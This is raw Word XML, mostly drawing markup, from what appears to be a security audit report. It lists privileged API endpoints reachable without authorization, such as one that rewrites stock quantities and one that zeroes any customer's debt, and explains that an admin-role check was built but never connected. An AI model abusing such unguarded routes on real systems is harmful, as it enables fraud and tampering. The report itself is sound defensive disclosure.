                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1570695" y="4648"/>
                                        <a:pt x="1571625" y="6896"/>
                                        <a:pt x="1571625" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="1571625" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1571625" y="126454"/>
                                        <a:pt x="1570695" y="128699"/>
                                        <a:pt x="1568835" y="130556"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1566975" y="132417"/>
                                        <a:pt x="1564730" y="133347"/>
                                        <a:pt x="1562100" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133347"/>
                                        <a:pt x="4650" y="132417"/>
                                        <a:pt x="2790" y="130556"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="128699"/>
                                        <a:pt x="0" y="126454"/>
                                        <a:pt x="0" y="123825"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="0" y="6896"/>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468" style="width:123.75pt;height:10.5pt;position:absolute;z-index:-2147483506;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.86304pt;" coordsize="15716,1333">
                      <v:shape id="Shape 600" style="position:absolute;width:15716;height:1333;left:0;top:0;" coordsize="1571625,133350" path="m9525,0l1562100,0c1564730,0,1566975,930,1568835,2787c1570695,4648,1571625,6896,1571625,9525l1571625,123825c1571625,126454,1570695,128699,1568835,130556c1566975,132417,1564730,133347,1562100,133350l9525,133350c6895,133347,4650,132417,2790,130556c930,128699,0,126454,0,123825l0,9525c0,6896,930,4648,2790,2787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POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>grns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/adjust-quantity</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66142560"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reached</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2DEACD7C"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Rewrite stock quantities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="29F1FBC1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="524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787F6E32" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="48"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6912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0685E6E3" wp14:editId="59F73E85">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2038350" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="28548" name="Group 28548"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="2038350" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="2038350" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="604" name="Shape 604"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="2038350" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="2038350" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="2028825" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="2031455" y="0"/>
                                        <a:pt x="2033700" y="927"/>
                                        <a:pt x="2035560" y="2787"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="2037420" y="4648"/>
                                        <a:pt x="2038350" y="6893"/>
                                        <a:pt x="2038350" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="2038350" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="2038350" y="135979"/>
                                        <a:pt x="2037420" y="138221"/>
                                        <a:pt x="2035560" y="140081"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="2033700" y="141942"/>
                                        <a:pt x="2031455" y="142872"/>
                                        <a:pt x="2028825" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142872"/>
                                        <a:pt x="4650" y="141942"/>
                                        <a:pt x="2790" y="140081"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138221"/>
                                        <a:pt x="0" y="135979"/>
                                        <a:pt x="0" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="0" y="6893"/>
                                        <a:pt x="930" y="4648"/>
                                        <a:pt x="2790"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548" style="width:160.5pt;height:11.25pt;position:absolute;z-index:-2147483502;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.86304pt;" coordsize="20383,1428">
                      <v:shape id="Shape 604" style="position:absolute;width:20383;height:1428;left:0;top:0;" coordsize="2038350,142875" path="m9525,0l2028825,0c2031455,0,2033700,927,2035560,2787c2037420,4648,2038350,6893,2038350,9525l2038350,133350c2038350,135979,2037420,138221,2035560,140081c2033700,141942,2031455,142872,2028825,142875l9525,142875c6895,142872,4650,141942,2790,140081c930,138221,0,135979,0,133350l0,9525c0,6893,930,4648,2790,2787c4650,927,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POST /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>customers/{id}/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>adjust-credit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185"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4BB36E26"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reached</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="37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3D95768E"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Zero any customer's debt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4353F09B" w14:textId="12C36BC0"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Root cause.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the most instructive finding in the report. The security control was </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>designed, implemented and registered</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then not connected. Everything about the codebase says someone understood the requirement. What was missing was any mechanism that would notice the gap: no test asserted that a privileged route refuses an employee, and nothing in code review made "which routes are admin-only?" a visible question.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06424DD1"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7936" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D266D06" wp14:editId="463170EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>256282</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-20766</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5314950" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28841" name="Group 28841"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5314950" cy="571500"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5314950" cy="571500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="616" name="Shape 616"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="238125" y="0"/>
                            <a:ext cx="2276475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2276475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2266950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2269580" y="0"/>
                                  <a:pt x="2271825" y="927"/>
                                  <a:pt x="2273685" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2275545" y="4648"/>
                                  <a:pt x="2276475" y="6893"/>
                                  <a:pt x="2276475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="2276475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2276475" y="135979"/>
                                  <a:pt x="2275545" y="138224"/>
                                  <a:pt x="2273685" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2271825" y="141942"/>
                                  <a:pt x="2269580" y="142872"/>
                                  <a:pt x="2266950" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142872"/>
                                  <a:pt x="4650" y="141942"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4648"/>
                                  <a:pt x="2790"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19" name="Shape 619"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2771774" y="0"/>
                            <a:ext cx="638175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633526" y="927"/>
                                  <a:pt x="635386" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4648"/>
                                  <a:pt x="638175" y="6893"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="135979"/>
                                  <a:pt x="637245" y="138224"/>
                                  <a:pt x="635386" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633526" y="141942"/>
                                  <a:pt x="631280" y="142872"/>
                                  <a:pt x="628650" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142872"/>
                                  <a:pt x="4650" y="141942"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4648"/>
                                  <a:pt x="2790"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27" name="Shape 627"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="438150"/>
                            <a:ext cx="866775" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="927"/>
                                  <a:pt x="863985" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4648"/>
                                  <a:pt x="866775" y="6893"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="126454"/>
                                  <a:pt x="865845" y="128696"/>
                                  <a:pt x="863985" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="132417"/>
                                  <a:pt x="859880" y="133347"/>
                                  <a:pt x="857250" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128696"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4648"/>
                                  <a:pt x="2790"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30" name="Shape 630"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3276600" y="438150"/>
                            <a:ext cx="1276350" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269455" y="0"/>
                                  <a:pt x="1271700" y="927"/>
                                  <a:pt x="1273560" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275419" y="4648"/>
                                  <a:pt x="1276350" y="6893"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="126454"/>
                                  <a:pt x="1275419" y="128696"/>
                                  <a:pt x="1273560" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="132417"/>
                                  <a:pt x="1269455" y="133347"/>
                                  <a:pt x="1266825" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2789" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128696"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4648"/>
                                  <a:pt x="2789"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33" name="Shape 633"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4848224" y="438150"/>
                            <a:ext cx="466726" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466726" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457201" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459831" y="0"/>
                                  <a:pt x="462076" y="927"/>
                                  <a:pt x="463936" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465796" y="4648"/>
                                  <a:pt x="466726" y="6893"/>
                                  <a:pt x="466726" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466726" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466726" y="126454"/>
                                  <a:pt x="465796" y="128696"/>
                                  <a:pt x="463936" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462076" y="132417"/>
                                  <a:pt x="459831" y="133347"/>
                                  <a:pt x="457201" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128696"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4648"/>
                                  <a:pt x="2790" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="927"/>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841" style="width:418.5pt;height:45pt;position:absolute;z-index:-2147483479;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:20.1797pt;mso-position-vertical-relative:text;margin-top:-1.63519pt;" coordsize="53149,5715">
                <v:shape id="Shape 616" style="position:absolute;width:22764;height:1428;left:2381;top:0;" coordsize="2276475,142875" path="m9525,0l2266950,0c2269580,0,2271825,927,2273685,2787c2275545,4648,2276475,6893,2276475,9525l2276475,133350c2276475,135979,2275545,138224,2273685,140084c2271825,141942,2269580,142872,2266950,142875l9525,142875c6895,142872,4650,141942,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6893,930,4648,2790,2787c4650,927,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 619" style="position:absolute;width:6381;height:1428;left:27717;top:0;" coordsize="638175,142875" path="m9525,0l628650,0c631280,0,633526,927,635386,2787c637245,4648,638175,6893,638175,9525l638175,133350c638175,135979,637245,138224,635386,140084c633526,141942,631280,142872,628650,142875l9525,142875c6895,142872,4650,141942,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6893,930,4648,2790,2787c4650,927,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 627" style="position:absolute;width:8667;height:1333;left:0;top:4381;" coordsize="866775,133350" path="m9525,0l857250,0c859880,0,862125,927,863985,2787c865845,4648,866775,6893,866775,9525l866775,123825c866775,126454,865845,128696,863985,130556c862125,132417,859880,133347,857250,133350l9525,133350c6895,133347,4650,132417,2790,130556c930,128696,0,126454,0,123825l0,9525c0,6893,930,4648,2790,2787c4650,927,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 630" style="position:absolute;width:12763;height:1333;left:32766;top:4381;" coordsize="1276350,133350" path="m9525,0l1266825,0c1269455,0,1271700,927,1273560,2787c1275419,4648,1276350,6893,1276350,9525l1276350,123825c1276350,126454,1275419,128696,1273560,130556c1271700,132417,1269455,133347,1266825,133350l9525,133350c6895,133347,4650,132417,2789,130556c930,128696,0,126454,0,123825l0,9525c0,6893,930,4648,2789,2787c4650,927,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 633" style="position:absolute;width:4667;height:1333;left:48482;top:4381;" coordsize="466726,133350" path="m9526,0l457201,0c459831,0,462076,927,463936,2787c465796,4648,466726,6893,466726,9525l466726,123825c466726,126454,465796,128696,463936,130556c462076,132417,459831,133347,457201,133350l9526,133350c6895,133347,4650,132417,2790,130556c930,128696,0,126454,1,123825l1,9525c0,6893,930,4648,2790,2787c4650,927,6895,0,9526,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Tellingly, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DiscountRequestController</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approve:156</w:t>
      </w:r>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reject:244</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> contain inline role checks. The knowledge was present; the systematic application was not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B006CB" w14:textId="04F55959"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8960" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71C5DD61" wp14:editId="4ECAD5A9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3332857</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>499536</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1514475" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28844" name="Group 28844"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1514475" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1514475" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="639" name="Shape 639"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1514475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1514475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1507581" y="0"/>
                                  <a:pt x="1509825" y="927"/>
                                  <a:pt x="1511685" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1513545" y="4645"/>
                                  <a:pt x="1514475" y="6890"/>
                                  <a:pt x="1514475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1514475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1514475" y="135979"/>
                                  <a:pt x="1513545" y="138224"/>
                                  <a:pt x="1511685" y="140081"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1509825" y="141942"/>
                                  <a:pt x="1507581" y="142872"/>
                                  <a:pt x="1504950" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142872"/>
                                  <a:pt x="4650" y="141942"/>
                                  <a:pt x="2789" y="140081"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2789" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="927"/>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844" style="width:119.25pt;height:11.25pt;position:absolute;z-index:-2147483467;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:262.43pt;mso-position-vertical-relative:text;margin-top:39.3336pt;" coordsize="15144,1428">
